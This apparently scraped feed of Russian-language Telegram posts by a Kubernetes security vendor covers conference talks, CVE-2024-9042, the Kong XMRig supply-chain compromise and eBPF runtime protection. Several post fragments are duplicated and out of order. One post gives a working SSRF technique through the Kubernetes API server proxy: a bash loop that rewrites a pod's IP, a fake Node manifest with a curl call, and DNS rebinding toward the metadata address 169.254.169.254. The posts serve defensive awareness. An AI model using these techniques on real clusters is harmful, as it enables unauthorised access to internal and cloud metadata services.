Наша команда Luntry поздравляет всех читателей канала с наступающим
На следующий год мы запланировали много всего очень интересно и полезного. Что-то мы готовили весь этот год и готовы представить в следующем, что-то сделаем впервые и о чем нас давно просили =)
Мы в большом предвкушении показать как наши новые фичи, так и новые исследования! Тут будут и истории про
Всем хорошо встретить праздники и набраться сил ;)
2025! Желаем всем счастья, здоровья в новом году и чтобы Kubernetes для вас стал не очередной головной болью, а их решением на пути к безопасной инфраструктуре и безопасным приложениям! А мы с командой вам также поможем на этом пути ;)На следующий год мы запланировали много всего очень интересно и полезного. Что-то мы готовили весь этот год и готовы представить в следующем, что-то сделаем впервые и о чем нас давно просили =)
Мы в большом предвкушении показать как наши новые фичи, так и новые исследования! Тут будут и истории про
0day и 1day в Kubernetes и популярных Cloud Native решения (пока ждем патчей - в новом году обновляться придется часто). Всем хорошо встретить праздники и набраться сил ;)
👍30☃15🎉12🍾8❤5🔥4
Когда-то мы рассказывали на канале о таком ресурсе как
Сегодня мы хотим поделиться
Однако, по правде сказать – ничего особенного, этакая замена привычному поиску по сайту.
HackTricks. Там был раздел, посвященный Kubernetes Security, однако потом он переехал на отдельный ресурс HackTricks Cloud.Сегодня мы хотим поделиться
AI Assistant от создателя этих ресурсов – HackTricks Assistant. По сути это чат-бот, который натренирован на информации с HackTricks. В том числе, по Kubernetes Security.Однако, по правде сказать – ничего особенного, этакая замена привычному поиску по сайту.
👍10🔥4🥰2❤1
Стали доступны записи выступлений с KubeCon + CloudNativeCon India 2024. Полный плейлист можно найти тут (это под 100 видео). Отдельно отметим доклады:
- A Deep Dive Into the Current Runtime Security Landscape
- Tutorial: Flatcar Container Linux Deep Dive: Deploying, Managing, and Automating Workloads Securely
- Enhance Kubernetes Security with the Common Expression Language (CEL)
- A Deep Dive Into the Current Runtime Security Landscape
- Tutorial: Flatcar Container Linux Deep Dive: Deploying, Managing, and Automating Workloads Securely
- Enhance Kubernetes Security with the Common Expression Language (CEL)
👍10🔥3💩2
Сегодня вновь затронем тему
Автор рассматривает две функции –
Самое интересное, что даже не нужны сертификаты
Если говорить про перформанс, то такой способ даёт оверхед, хоть и всего 0.2 мкс. Кроме того, средняя нагрузка на процессор, создаваемая каждым хуком, выглядит следующим образом: 0,1% для
eBPF, а точнее observability зашифрованного трафика с помощью этой технологии – статья "What Insights Can eBPF Provide into Real-Time SSL/TLS Encrypted Traffic and How?" как раз об этом.Автор рассматривает две функции –
SSL_write() для записи данный (используется для перехвата данных, записанных клиентом, но еще не зашифрованных) и SSL_read() для чтения данных из SSL соединения. Эта функция позволяет перехватить расшифрованные данные, а также разобрать код ответа.Самое интересное, что даже не нужны сертификаты
TLS/SSL для расшифровки или шифрования трафика. Это позволяет наблюдать за протоколом приложения как до шифрования, так и после расшифровки.Если говорить про перформанс, то такой способ даёт оверхед, хоть и всего 0.2 мкс. Кроме того, средняя нагрузка на процессор, создаваемая каждым хуком, выглядит следующим образом: 0,1% для
uprobe/SSL_write*, 0,007% для uprobe/SSL_read* и 0,3% для uretprobe/SSL_read. Замеры проводились на 1000 запросах для каждого HTTP метода.👍12🔥5
Простая и понятная визуализация на тему как выбрать соответствующий
О том что
Ну и вообще не только
Distroless образ от Google для вашего приложения.О том что
distroless бывают разные мы писали тут. И не забываем что там не все идеально - об этом писали тут ;)Ну и вообще не только
Google такое делает. И вообще можно это делать своими руками.🔥27👍7❤5🤮2🙏1👌1
Первая конференция в 2025-ом году, которая зацепила наше внимание –
В докладе авторы рассказывают много чего интересного – затрагивают проблемы
Также в докладе был упомянут новый инструмент Seccomp-Diff, который может сравнивать
ShmooCon 2025. Там было много интересных докладов, в том числе там был доклад и про Kubernetes Security – "A Commencement into Real Kubernetes Security (Jay Beale and Mark Manning)".В докладе авторы рассказывают много чего интересного – затрагивают проблемы
system call filtering system, приводящие к TOCTOU, говорят про инструменты для генерации и управления seccomp профилями в Kubernetes, показывают демо работы с инструментами peirates и KubeHound (1, 2).Также в докладе был упомянут новый инструмент Seccomp-Diff, который может сравнивать
Seccomp профили двух контейнеров и подсвечивать наиболее опасные системные вызовы. Может работать как CLI, так и через веб-приложение.👍13🔥3❤1
Сегодня мы вам рекомендуем изучить статью "Building Container Images FROM Scratch: 6 Pitfalls That Are Often Overlooked" (Иван продолжай в том же духе ;)). Название говорит само за себя. Все с наглядными примерами проблем и их решениями.
👍29🥰4❤3🔥3
Вышло очередное новое видео из серии
Kubernetes Security Fundamentals от Rory McCune. Это видео про Authentication, а вернее о том как работает аутентификация учетных записей сервисов в Kubernetes. Видео доступно по ссылке тут.YouTube
Kubernetes Security Fundamentals: Authentication - Part 3
In this video we’ll continue looking at how Kubernetes handles authentication with a look at service account token authentication. If you’d like more information please see our security labs post https://securitylabs.datadoghq.com/articles/kubernetes-security…
👍14🔥4❤2
Начнем эту неделю со статьи "Reproducing CVE-2024-9042: Command Injection in Windows Kubernetes Nodes" про CVE-2024-9042, которая описывается вендором: Command Injection affecting Windows nodes via nodes/*/logs/query API. Ключевые моменты:
- Только
- Должен быть включен
-
-
- Позволяет выполнять команды на всех
Вот как-то само собой так получается, что когда мы рассказываем [1,2] про
P.S. Кто-нибудь
- Только
Windows- Должен быть включен
NodeLogQuery feature gate (по умолчанию сейчас выключен и эту ручку упоминали тут) -
pattern параметр этой фичи напрямую передается в Powershell без фильтрации-
command injection любым пользователем и service account с правами GET на nodes/logs- Позволяет выполнять команды на всех
Windows нодах от NTAuthority\systemВот как-то само собой так получается, что когда мы рассказываем [1,2] про
Kubernetes в Windows мире, это обязательно про какие-то баги. И при этом эти баги не проходные, а которые действительно могут быть очень полезны атакующему.P.S. Кто-нибудь
Kubernetes кластера на Windows держит или игрался с ними?Amberwolf
Reproducing CVE-2024-9042: Command Injection in Windows Kubernetes Nodes
AmberWolf Security Research Blog
👍8🔥3
Сегодняшним постом продолжаем тематику наступательной безопасности в
Наверняка вы знаете, что
Очевидно, что
Бага 2019 года (упоминали про неё на канале тут), но она всё еще работает. Всё что нужно – это перезаписать
Если у вас есть возможность создавать
Эксплуатация уязвимости типа
Про эти и другие способы использования
Kubernetes, а именно – рассмотрим механизм Proxy в Kubernetes API Server. Наверняка вы знаете, что
Kubernetes API Server может выступать в качестве HTTP-прокси сервера, позволяя пользователям с соответствующими правами (create nodes/proxy, pods/proxy) получить доступ к Nodes или Pods.Очевидно, что
kubectl proxy позволяет по сути экспулатировать SSRF, поэтому рассмотрим несколько интересных способов использования этой функциональности:1) Проксирование на адреса вне кластераБага 2019 года (упоминали про неё на канале тут), но она всё еще работает. Всё что нужно – это перезаписать
IP адрес в поле status в манифесте Pod, а затем проксировать запросы на этот адрес. Однако, это может вызвать некоторые сложности, т.к Kubernetes распознает это изменение как ошибку и изменяет значение на действительный IP-адрес, поэтому вам придется зацикливать запросы, чтобы сохранить его установленным на нужное вам значение:
#!/bin/bash
set -euo pipefail
readonly PORT=8001
readonly POD=echoserver
readonly TARGETIP=1.1.1.1
while true; do
curl -v -H 'Content-Type: application/json' \
"https://localhost:${PORT}/api/v1/namespaces/default/pods/${POD}/status" >"${POD}-orig.json"
cat $POD-orig.json |
sed 's/"podIP": ".*",/"podIP": "'${TARGETIP}'",/g' \
>"${POD}-patched.json"
curl -v -H 'Content-Type:application/merge-patch+json' \
-X PATCH -d "@${POD}-patched.json" \
"https://localhost:${PORT}/api/v1/namespaces/default/pods/${POD}/status"
rm -f "${POD}-orig.json" "${POD}-patched.json"
done
2) SSRF через Fake NodeЕсли у вас есть возможность создавать
Nodes, то в манифесте достаточно указать желаемый адрес, для того чтобы проксировать туда запросы:
kind: Node
apiVersion: v1
metadata:
name: fakegoogle
status:
addresses:
- address: www.google.com
type: Hostname
curl https://127.0.0.1:8001/api/v1/nodes/http:fakegoogle:80/proxy/
3) CVE-2020-8562 – Обход blacklistЭксплуатация уязвимости типа
TOCTOU, на данный момент не имеющей патча, будет особенно интересна, если вы находитесь в окружении облачного провайдера без возможности делать запросы на 169.254.169.254. Прибегнув к известной технике для эксплуатации SSRF – DNS rebinding можно обойти это ограничение, для этого, например, можно воспользоваться сервисом rebinder.Про эти и другие способы использования
kubectl proxy рассказал Rory McCune в своей статье "Exploring the Kubernetes API Server Proxy".👍16❤5🔥3🥰2
На Хабре вышла наша статья "Безопасность Kubernetes-кластеров: вредные советы или bullshit bingo", которая по сути является текстовым представлением нашего выступления с
DevOpsConf 2024. В общем, для тех кому ближе текст, а не видео. И как всегда задавайте любые вопросы в комментариях!Хабр
Безопасность Kubernetes-кластеров: вредные советы или bullshit bingo
Как погубить кластер, действуя во благо? Подборка вредных советов из реальных кейсов и опыта от специалиста по безопасности контейнеров и Kubernetes. Вместе установим антивирус на ноды, просканируем...
👍21🔥12❤5
Неприятная история случилась с
1) 28 августа 2024 года разработчики из
2) 25 ноября 2024 года они получают анонимный отчет от исследователя безопасности о том, что их репозиторий подвержен атаке Pwn request. После этого мейнтейнеры провели ротацию всех секретов в репозитории и вернули триггерное событие обратно на
3) Спустя почти два месяца, а именно 23 декабря 2024 года атакующие начали разведку – они получили доступ к секретам, в том числе к персональному токену доступа
4) Примерно через 22 часа – 24 декабря злоумышленники перешли на основной репозиторий с полученным на предудыщем шаге
5) 29 декабря 2024 года 4 пользователя отметили в
6) 2 января 2025 мейнтейнеры подтвердили, что образ был скомпрометирован, а вунтри него содержался
Более подробно о всей ситуации можно почитать в блоге
Kong Ingress Controller в конце прошлого года – в прод попал образ, содержащий в себе майнер XMRig. Таймлайн происходящего был таков:1) 28 августа 2024 года разработчики из
Kong исправляют свои пайплайны меняя pull_request на pull_request_target2) 25 ноября 2024 года они получают анонимный отчет от исследователя безопасности о том, что их репозиторий подвержен атаке Pwn request. После этого мейнтейнеры провели ротацию всех секретов в репозитории и вернули триггерное событие обратно на
pull_request. Но только для главной ветки. Так что старые неиспользуемые ветки продолжили использовать pull_request_target, а значит были уязвимы.3) Спустя почти два месяца, а именно 23 декабря 2024 года атакующие начали разведку – они получили доступ к секретам, в том числе к персональному токену доступа
GitHub, проэксплуатировав уязвимость в одном из репозиториев.4) Примерно через 22 часа – 24 декабря злоумышленники перешли на основной репозиторий с полученным на предудыщем шаге
access token. Они запушили образ docker.io/kong/kubernetes-ingress-controller на Dockerhub с тегом 3.4.5) 29 декабря 2024 года 4 пользователя отметили в
issue на GitHub, что запуск Kong Ingress Controller приводит к аномально высокой нагрузке на ЦП.6) 2 января 2025 мейнтейнеры подтвердили, что образ был скомпрометирован, а вунтри него содержался
XMRig.Более подробно о всей ситуации можно почитать в блоге
KIC тут. Также было опубликовано YARA правило для обнаружения таких нагрузок.GitHub
Unauthorized image of Kong Ingress Controller v.3.4.0
### Summary
On December 23, 2024, an unauthorized image of Kong Ingress Controller v.3.4.0 (hash: `sha256:a00659df0771d076fc9d0baf1f2f45e81ec9f13179f499d4cd940f57afc75d43`) was uploaded to DockerH...
On December 23, 2024, an unauthorized image of Kong Ingress Controller v.3.4.0 (hash: `sha256:a00659df0771d076fc9d0baf1f2f45e81ec9f13179f499d4cd940f57afc75d43`) was uploaded to DockerH...
🔥28😨12👍8❤2🤓2🥰1😐1
Замечательная статья "Runtime Security and the Role of eBPF/BPF-LSM", которая достаточно понятно объясняет как работает настоящий
В качестве подопытных рассматриваются
У нас в Luntry есть функциональность для обнаружения, реагирование со сбором артефактов, предотвращения на базе
Более детально мы сравнивали различные
prevention (предотвращение) в Linux с помощью eBPF. В качестве подопытных рассматриваются
Falco, Tetragon и KubeArmor - все с разными подходами к реализации. Первые два не дают никакого предотвращения, а только реагирование. Falco из user space отправляет kill сигнал, а tetragon из kernel space отправляет bpf_send_signal(). Это характерно не только им, но и всем реализациям, которые опираются не на Linux Security Modules (LSM). И если вам рассказывают/заявляют обратное, то вам попросту врут.У нас в Luntry есть функциональность для обнаружения, реагирование со сбором артефактов, предотвращения на базе
AppArmor (он опирается на LSM) и уже на подходе собственная реализация предотвращения на базе eBPF-LSM.Более детально мы сравнивали различные
security runtime-решения в вебинаре "Runtime Security: на вкус и цвет все фломастеры разные".👍18❤5🔥2🥰1
Проект
Аудиторы из
Краткую выжимку всех находок можно почитать в блоге
Notary (еще один проект, помимо Cosign, для подписи и верификации артефактов) прошел второй security audit.Аудиторы из
Quarks Lab в своем отчете отразили 11 findings, 2 из которых уже присвоили CVE:CVE-2024-56138: Time stamp signature generation lacks certificate revocation check
CVE-2024-51491: Process crash during CRL-based revocation check on OS using separate mount point for temp DirectoryКраткую выжимку всех находок можно почитать в блоге
Quarks Lab тут, а полный отчет в репозитории Notary тут.👍12🔥3🤡2❤1
13 февраля на ТБ Форуме пройдет доклад Анатолия Карпенко, инженера по автоматизации Luntry, на тему “Основы анализа СЗИ в контейнерном исполнении с помощью Luntry”.
За достаточно небольшой временной интервал мы с вами пройдем путь от полного неведения о попавшем нам в руки для анализа СЗИ в контейнерном исполнении, до полного понимания, что это за средство, как оно устроено и насколько все хорошо у него с безопасностью.
В рамках доклада:
- Узнаем, как можно быстро понять исследуемое приложение с точки зрения его компонентов и активности;
- Разберемся, на какие аспекты образов контейнеров стоит обращаться внимание с точки зрения информационной безопасности;
- Поднявшись на уровень выше, углубимся в свойства безопасности на уровне контейнеров и
- На каждом этапе остановимся на рекомендациях по исправлению и улучшению уровня безопасности контейнерного приложения.
За достаточно небольшой временной интервал мы с вами пройдем путь от полного неведения о попавшем нам в руки для анализа СЗИ в контейнерном исполнении, до полного понимания, что это за средство, как оно устроено и насколько все хорошо у него с безопасностью.
В рамках доклада:
- Узнаем, как можно быстро понять исследуемое приложение с точки зрения его компонентов и активности;
- Разберемся, на какие аспекты образов контейнеров стоит обращаться внимание с точки зрения информационной безопасности;
- Поднявшись на уровень выше, углубимся в свойства безопасности на уровне контейнеров и
YAML файлов, описывающих их в Kubernetes.- На каждом этапе остановимся на рекомендациях по исправлению и улучшению уровня безопасности контейнерного приложения.
🔥11👍6❤2🥰2
Благодаря посту выше мы вышли на статью "The (Anti-)EDR Compendium" и решили сами обдумать действительно насколько это схоже с тем, что можно наблюдать в контейнерном мире, в
Основные моменты, которые хотелось бы подсветить:
1) Чем больше детектирующей логики на агенте/сенсоре, тем больше влияние на производительность и вообще возможность обработать большой поток сообщений (упираемся в лимиты и дропы). В контейнерном Мире все ухудшается тем, что там в большинстве своем высоконагруженные приложения и они генерируют большое количество событий, не под стать пользовательской машине. На пример мы встречали кейсы, где порождалось по
2) Сложные анализы на агенте/сенсоре — это всегда большие оверхеды. В разделе "Performance Impact" рассматривается ситуация сканирование памяти и файлом антивирусным движком. Как я думаю вы уже догадались это дорого! И это очень плохо влияет на систему контейнеризации (привет
Есть еще много общего и это мы рассматривали в вебинаре "Runtime Security: на вкус и цвет все фломастеры разные".
Kubernetes при работе runtime security решений агентской природы (то, что ставится на Node и мониторит происходящее там).Основные моменты, которые хотелось бы подсветить:
1) Чем больше детектирующей логики на агенте/сенсоре, тем больше влияние на производительность и вообще возможность обработать большой поток сообщений (упираемся в лимиты и дропы). В контейнерном Мире все ухудшается тем, что там в большинстве своем высоконагруженные приложения и они генерируют большое количество событий, не под стать пользовательской машине. На пример мы встречали кейсы, где порождалось по
100тыщ процессов в секунду (и это явно не предел, а с сетевыми может быть и еще хуже ситуация)! И чем больше там правил, тем больше времени и ресурсов надо чтобы это разобрать.2) Сложные анализы на агенте/сенсоре — это всегда большие оверхеды. В разделе "Performance Impact" рассматривается ситуация сканирование памяти и файлом антивирусным движком. Как я думаю вы уже догадались это дорого! И это очень плохо влияет на систему контейнеризации (привет
overlayfs) и об этом и говорит документация docker. Иначе это приведет к сбоям в работе контейнерных приложений.Есть еще много общего и это мы рассматривали в вебинаре "Runtime Security: на вкус и цвет все фломастеры разные".
👍9🔥4❤2
Напоминаем, что идет прием заявок на доклады на конференцию БеКон 2025!
Если мы на предыдущие конференции только приглашали докладчиков из наших клиентов, друзей и партнеров, на конкретные темы, то сейчас появляется возможность предложить свою тему самостоятельно ;)
Требования к заявке:
- Продолжительность доклада — не более 25 минут
- Тема по безопасности контейнеров и
- Выступление рассчитано на технических специалистов
- Доклад актуален и основан на личном опыте
- Доклад ранее нигде не был представлен
- Доклад глубоко раскрывает тему и имеет практическое применение
Заявки принимаются до 31 марта! Сама конференция будет в начале июня.
Если мы на предыдущие конференции только приглашали докладчиков из наших клиентов, друзей и партнеров, на конкретные темы, то сейчас появляется возможность предложить свою тему самостоятельно ;)
Требования к заявке:
- Продолжительность доклада — не более 25 минут
- Тема по безопасности контейнеров и
Kubernetes- Выступление рассчитано на технических специалистов
- Доклад актуален и основан на личном опыте
- Доклад ранее нигде не был представлен
- Доклад глубоко раскрывает тему и имеет практическое применение
Заявки принимаются до 31 марта! Сама конференция будет в начале июня.
🔥9❤1👍1🤩1
Занимательный материал "Migrating from Istio to Linkerd". Ранее подобного не встречал, а при этом последние наверное полгода - год вопросы про
А как у вас отношение к
Linkerd от друзей и клиентов мы получаем. Так что эта статья будет как раз в тему. При этом там и про механизмы безопасности не забыли в разделе "Migrating authorization policy".А как у вас отношение к
Linkerd?)www.buoyant.io
Migrating from Istio to Linkerd
In this guide we'll walk you through a task that is increasingly common in the Kubernetes space: migrating an existing Istio deployment to Linkerd.
👍15🔥2❤1
Вышла очередная статья из цикла
В начале автор рассказывает про так называемые
В конце, автор приводит манифест для поднятия демо-стенда.
Kubernetes security fundamentals от Rory McCune, на этот раз про Networking.В начале автор рассказывает про так называемые
Network trust zones, а потом представляет CNI, сетевые политики и способы управления ими. В конце, автор приводит манифест для поднятия демо-стенда.
👍17🔥4👏2
В одном из своих прошлых постов мы уже упоминали доклад "Commencement into Real Kubernetes Security" от Jay Beale и Mark Manning с конференции ShmooCon 2025 и там делали акцент на релизе инструмента Seccomp-Diff. А сегодня хочется сделать акцент на самом докладе, потому что он просто великолепный и мысли авторов во многих моментах совпадают с нашими (которые мы рассказываем в наших выступлениях). Приятно что у мировых звезд индустрии такой же взгляд ;)
И так:
- Видео выступления
- Слайды выступления
- Демо из выступления (Взлом
И в шапке поста несколько шедевральных слайдов, там таких много, поэтому презентация MUST SEE! На самом деле прям хочется сделать отдельный стрим с разбором данной преза - настолько там много всего хорошего)
И так:
- Видео выступления
- Слайды выступления
- Демо из выступления (Взлом
CIS соответствующего кластера без CVE - для многих это идеал)И в шапке поста несколько шедевральных слайдов, там таких много, поэтому презентация MUST SEE! На самом деле прям хочется сделать отдельный стрим с разбором данной преза - настолько там много всего хорошего)
🔥17
Kubernetes Netowrk Policies Done the Right Way by Isovalent.pdf
7.9 MB
Инженеры из
Из этой книги вы узнаете:
- Что такое
- Про разные подходы к использованию сетевых политик, управление ими, и их конфигурацию
- Про принятие принципа
Экземпляр книги прикладываем во вложении к посту.
Cilium опубликовали книгу Kubernetes Network Policies Done the Right Way.Из этой книги вы узнаете:
- Что такое
NetworkPolicy, какова их роль в обеспечении безопасности workloads, и как преодолеть проблемы с их внедрением- Про разные подходы к использованию сетевых политик, управление ими, и их конфигурацию
- Про принятие принципа
Zero Trust, использование Hubble для повышение observabilityЭкземпляр книги прикладываем во вложении к посту.
👍35🔥17❤2👎1